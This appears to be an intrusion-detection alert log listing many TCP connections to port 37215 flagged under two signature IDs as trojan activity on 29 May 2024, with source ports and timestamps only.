                SID:2835222
                Source Port:48572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.617033
                SID:2829579
                Source Port:38648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.868181
                SID:2829579
                Source Port:50740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989719
                SID:2829579
                Source Port:53606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178811
                SID:2835222
                Source Port:58194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184415
                SID:2835222
                Source Port:34210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.961963
                SID:2835222
                Source Port:43214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.551217
                SID:2835222
                Source Port:50522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714495
                SID:2829579
                Source Port:57262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171848
                SID:2835222
                Source Port:47174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611112
                SID:2829579
                Source Port:40702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262705
                SID:2835222
                Source Port:52312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.537068
                SID:2835222
                Source Port:43438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265685
                SID:2829579
                Source Port:59448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836653
                SID:2835222
                Source Port:48578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266621
                SID:2835222
                Source Port:56454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778071
                SID:2835222
                Source Port:46000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287044
                SID:2829579
                Source Port:45738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782101
                SID:2835222
                Source Port:47526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025567
                SID:2835222
                Source Port:51394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.612251
                SID:2829579
                Source Port:32794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878690
                SID:2835222
                Source Port:44642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728238
                SID:2829579
                Source Port:42756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286349
                SID:2829579
                Source Port:34758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631296
                SID:2829579
                Source Port:39920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176987
                SID:2835222
                Source Port:59600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519726
                SID:2835222
                Source Port:55146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.281531
                SID:2829579
                Source Port:50834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869457
                SID:2835222
                Source Port:49356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975188
                SID:2835222
                Source Port:33472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948629
                SID:2835222
                Source Port:60176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.220727
                SID:2835222
                Source Port:51272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916233
                SID:2835222
                Source Port:58408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.390300
                SID:2835222
                Source Port:59756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263565
                SID:2835222
                Source Port:42702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618793
                SID:2835222
                Source Port:33422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614312
                SID:2835222
                Source Port:36112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.845486
                SID:2835222
                Source Port:53080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898370
                SID:2829579
                Source Port:35810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873565
                SID:2835222
                Source Port:53756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584562
                SID:2835222
                Source Port:50750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518945
                SID:2829579
                Source Port:39352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628250
                SID:2829579
                Source Port:56996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010673
                SID:2829579
                Source Port:38042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.911219
                SID:2829579
                Source Port:36160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726940
                SID:2835222
                Source Port:49374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321206
                SID:2829579
                Source Port:48900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787715
                SID:2835222
                Source Port:53286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.235119
                SID:2835222
                Source Port:55708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.316043
                SID:2835222
                Source Port:48532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.961883
                SID:2835222
                Source Port:39344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521293
                SID:2829579
                Source Port:47096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521800
                SID:2835222
                Source Port:46070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.710694
                SID:2829579
                Source Port:46186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897276
                SID:2835222
                Source Port:35538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.963145
                SID:2835222
                Source Port:42822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.872582
                SID:2835222
                Source Port:37846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.920909
                SID:2829579
                Source Port:33158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.771188
                SID:2829579
                Source Port:49578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618867
                SID:2835222
                Source Port:55214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236723
                SID:2829579
                Source Port:50698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.868251
                SID:2829579
                Source Port:54142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264635
                SID:2829579
                Source Port:40754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870108
                SID:2829579
                Source Port:51788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668476
                SID:2835222
                Source Port:50718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982114
                SID:2829579
                Source Port:46888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.868023
                SID:2829579
                Source Port:43340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.930010
                SID:2829579
                Source Port:56650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.498952
                SID:2835222
                Source Port:55392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.664242
                SID:2835222
                Source Port:47028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.703448
                SID:2829579
                Source Port:54460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.764001
                SID:2835222
                Source Port:48556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500494
                SID:2829579
                Source Port:33710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.821537
                SID:2829579
                Source Port:39492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789215
                SID:2835222
                Source Port:45322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.805881
                SID:2835222
                Source Port:47868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472085
                SID:2829579
                Source Port:45408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964636
                SID:2829579
                Source Port:57152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558021
                SID:2829579
                Source Port:50390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.320489
                SID:2835222
                Source Port:36158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781133
                SID:2829579
                Source Port:34594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.981464
                SID:2829579
                Source Port:55382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207547
                SID:2835222
                Source Port:47218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558605
                SID:2835222
                Source Port:51090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163835
                SID:2829579
                Source Port:36684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.570095
                SID:2829579
                Source Port:40960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267871
                SID:2829579
                Source Port:42838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437178
                SID:2829579
                Source Port:33820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618839
                SID:2829579
                Source Port:45318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.799791
                SID:2829579
                Source Port:46604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332662
                SID:2829579
                Source Port:33478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445923
                SID:2835222
                Source Port:44268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210098
                SID:2835222
                Source Port:43688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.694584
                SID:2829579
                Source Port:52850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.101065
                SID:2829579
                Source Port:34922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.360507
                SID:2829579
                Source Port:53040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508203
                SID:2829579
                Source Port:33636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.220980
                SID:2835222
                Source Port:48034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111128
                SID:2835222
                Source Port:42712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166215
                SID:2835222
                Source Port:32908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210932
                SID:2829579
                Source Port:34006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.850509
                SID:2835222
                Source Port:42162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572264
                SID:2829579
                Source Port:38442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319297
                SID:2835222
                Source Port:41576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531614
                SID:2835222
                Source Port:46798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.850054
                SID:2829579
                Source Port:59894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660275
                SID:2829579
                Source Port:36650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.783781
                SID:2835222
                Source Port:33344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.929989
                SID:2829579
                Source Port:41486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915508
                SID:2835222
                Source Port:34178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.739811
                SID:2829579
                Source Port:37910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716130
                SID:2829579
                Source Port:40366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419762
                SID:2835222
                Source Port:55430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212845
                SID:2835222
                Source Port:53052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654311
                SID:2829579
                Source Port:58472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.446367
                SID:2835222
                Source Port:52104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.813163
                SID:2829579
                Source Port:42072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.238862
                SID:2835222
                Source Port:35440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.876294
                SID:2835222
                Source Port:42324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.261418
                SID:2835222
                Source Port:45694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899607
                SID:2829579
                Source Port:52490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263660
                SID:2835222
                Source Port:34992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711909
                SID:2829579
                Source Port:48104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670432
                SID:2829579
                Source Port:54926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088527
                SID:2829579
                Source Port:48346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.562145
                SID:2835222
                Source Port:46218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787289
                SID:2829579
                Source Port:47608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.555821
                SID:2829579
                Source Port:42628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.980949
                SID:2835222
                Source Port:39860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.453527
                SID:2835222
                Source Port:45714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561850
                SID:2835222
                Source Port:37946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965001
                SID:2829579
                Source Port:41202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.584962
                SID:2829579
                Source Port:53954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166118
                SID:2835222
                Source Port:43702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762972
                SID:2835222
                Source Port:55912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854519
                SID:2829579
                Source Port:49566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666112
                SID:2829579
                Source Port:34124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.788197
                SID:2829579
                Source Port:41264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.740062
                SID:2829579
                Source Port:51590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519153
                SID:2829579
                Source Port:32930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854401
                SID:2835222
                Source Port:46790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.528109
                SID:2829579
                Source Port:49622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863368
                SID:2835222
                Source Port:38684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321991
                SID:2835222
                Source Port:41788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716227
                SID:2835222
                Source Port:55210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.028088
                SID:2829579
                Source Port:39544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652511
                SID:2829579
                Source Port:50320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.528196
                SID:2829579
                Source Port:46710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038151
                SID:2829579
                Source Port:37902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432640
                SID:2835222
                Source Port:45964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.849516
                SID:2835222
                Source Port:57650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726374
                SID:2829579
                Source Port:44036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.414973
                SID:2835222
                Source Port:47716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.278836
                SID:2829579
                Source Port:60648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.028056
                SID:2829579
                Source Port:51254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896963
                SID:2829579
                Source Port:49398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.953187
                SID:2829579
                Source Port:32964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336418
                SID:2829579
                Source Port:59638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.137039
                SID:2835222
                Source Port:50136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912962
                SID:2835222
                Source Port:57384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977950
                SID:2835222
                Source Port:56106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.616359
                SID:2835222
                Source Port:49602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.788364
                SID:2829579
                Source Port:39650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.867835
                SID:2835222
                Source Port:36950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.518939
                SID:2835222
                Source Port:59718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182479
                SID:2829579
                Source Port:46438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.940050
                SID:2835222
                Source Port:52198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556707
                SID:2829579
                Source Port:52572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.233356
                SID:2829579
                Source Port:48674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225611
                SID:2829579
                Source Port:33050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614091
                SID:2835222
                Source Port:57064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.234244
                SID:2829579
                Source Port:51330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440882
                SID:2835222
                Source Port:49832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170193
                SID:2829579
                Source Port:50200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.848193
                SID:2835222
                Source Port:48608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.455182
                SID:2835222
                Source Port:55532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.817251
                SID:2829579
                Source Port:46072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597987
                SID:2829579
                Source Port:56224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223050
                SID:2835222
                Source Port:50184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863540
                SID:2829579
                Source Port:53654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.323062
                SID:2835222
                Source Port:53226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231318
                SID:2835222
                Source Port:34798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.971483
                SID:2829579
                Source Port:40132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.442771
                SID:2829579
                Source Port:34686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782534
                SID:2835222
                Source Port:55900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848744
                SID:2829579
                Source Port:57950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.120346
                SID:2829579
                Source Port:34718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909799
                SID:2829579
                Source Port:38610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.719487
                SID:2835222
                Source Port:46176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.058397
                SID:2835222
                Source Port:57524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212262
                SID:2829579
                Source Port:46784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.966823
                SID:2835222
                Source Port:50188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675117
                SID:2829579
                Source Port:41700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023347
                SID:2835222
                Source Port:60466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612302
                SID:2835222
                Source Port:48842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981210
                SID:2829579
                Source Port:59122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997684
                SID:2829579
                Source Port:48142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.280506
                SID:2835222
                Source Port:53984
                Destination Port:37215
